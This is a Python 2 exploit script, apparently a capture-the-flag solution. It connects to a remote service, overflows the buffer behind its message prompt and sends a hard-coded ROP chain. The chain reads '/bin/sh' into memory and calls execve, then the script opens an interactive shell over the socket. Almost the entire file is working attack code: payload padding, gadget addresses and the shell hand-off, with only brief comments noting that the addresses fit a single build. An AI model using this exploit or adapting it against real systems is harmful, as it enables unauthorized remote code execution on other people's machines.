#!/usr/bin/env python2
import sys, socket, telnetlib
from struct import *
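def recvuntil(t, sock=None):
    """Read from the connection one byte at a time until *t* has arrived.

    Args:
        t: Delimiter to stop at. Use the same type ``recv`` returns on the
           interpreter in use (str under Python 2, bytes under Python 3).
        sock: Connected socket to read from. Defaults to the module-level
            socket ``s`` so existing callers keep working unchanged.

    Returns:
        Everything received up to and including *t*. If the peer closes the
        connection before *t* is seen, the partial data received so far is
        returned instead; no exception is raised for that case.
    """
    conn = s if sock is None else sock
    # Start from an empty value of the delimiter's own type so that both
    # ``endswith`` and ``+=`` work whether *t* is str (py2) or bytes (py3).
    data = t[:0]
    while not data.endswith(t):
        # One byte at a time so nothing past the delimiter is consumed.
        chunk = conn.recv(1)
        if not chunk:
            # EOF: the peer hung up before the delimiter arrived.
            break
        data += chunk
    return data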
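def interactive(sock=None):
    """Hand the connected socket over to an interactive terminal session.

    Args:
        sock: Connected socket to relay. Defaults to the module-level socket
            ``s`` so existing callers keep working unchanged.

    Blocks until the session ends. Relies on ``telnetlib``, which is
    deprecated since Python 3.11 and removed in Python 3.13.
    """
    conn = s if sock is None else sock
    session = telnetlib.Telnet()
    # Telnet() without a host opens nothing; attach the already-open socket.
    session.sock = conn
    session.interact()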
def p32(x):
    """Pack *x* as a 4-byte little-endian unsigned integer."""
    return Struct('<I').pack(x)
def u32(x):
    """Unpack a 4-byte little-endian unsigned integer from *x*."""
    (value,) = Struct('<I').unpack(x)
    return value
def p64(x):
    """Pack *x* as an 8-byte little-endian unsigned integer."""
    return Struct('<Q').pack(x)
def u64(x):
    """Unpack an 8-byte little-endian unsigned integer from *x*."""
    (value,) = Struct('<Q').unpack(x)
    return value
# --- Driver (Python 2 only: `print` statement, str payloads) ---
# Usage: exploit.py <host> <port>. Opens a TCP connection, answers the two
# prompts the service prints, then sends one oversized "message" carrying
# the hard-coded buffer layout and ROP chain below.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
# Wait for the name prompt and answer with a single character.
print recvuntil("Please tell me your name >> ")
s.send("A\n")
print recvuntil("Give me your message >> ")
# Message payload. Every address below is an absolute, hard-coded value;
# NOTE(review): such a chain only fits one specific target build, and a
# PIE/ASLR-randomised build would not be reachable at these addresses.
# The meaning of the repeated (0xc820080000, 0x10) pair is not documented
# on this page — confirm against the target before relying on it.
p = "C" * 104
p += p64(0xc820080000)
p += p64(0x10)
p += "B" * (200-len(p))
p += p64(0xc820080000) + p64(0x10) + "A" * (192)
# ROPCHAIN read /bin/sh into bss
p += p64(0x00000000004016ea) #pop rax -> rax must be a valid address to use 0x0000000000470931 gadget
p+= p64(0x000000000059f920 + 1) # rax content
p += p64(0x0000000000470931) # pop rdi ; or byte ptr [rax + 0x39], cl ; ret
p += p64(0x0) # rdi value
p += p64(0x000000000046defd) #pop rsi
p += p64(0x000000000059f920) #bss address
p += p64(0x000000000046ec93) #pop rdx
p += p64(0x10) # bytes to read
p += p64(0x00000000004016ea) #pop rax -> number syscall
p += p64(0x0) # 0 = syscall read
p += p64(0x0000000000456889) #syscall; ret
# ROPCHAIN execve /bin/sh
p += p64(0x00000000004016ea) #pop rax
p+= p64(0x000000000059f920 + 100) # rax content
p += p64(0x000000000046defd) #pop rsi
p += p64(0x0)
p += p64(0x0000000000470931) # : pop rdi ; or byte ptr [rax + 0x39], cl ; ret
p += p64(0x59f920) # bss address
p += p64(0x00000000004016ea) #pop rax
p+= p64(59) # execve syscall = 59
p += p64(0x00000000004599ca) #pop rdx + ff2
p += p64(0x0)
p += p64(0x0000000000456889) # syscall
# Send the message; the second send supplies the string that the "read"
# stage of the chain above is set up to receive (per the author's comments).
s.send(p + "\n")
s.send("/bin/sh\x00\n")
# Blocks until the interactive session ends, then releases the socket.
interactive()
s.close()
#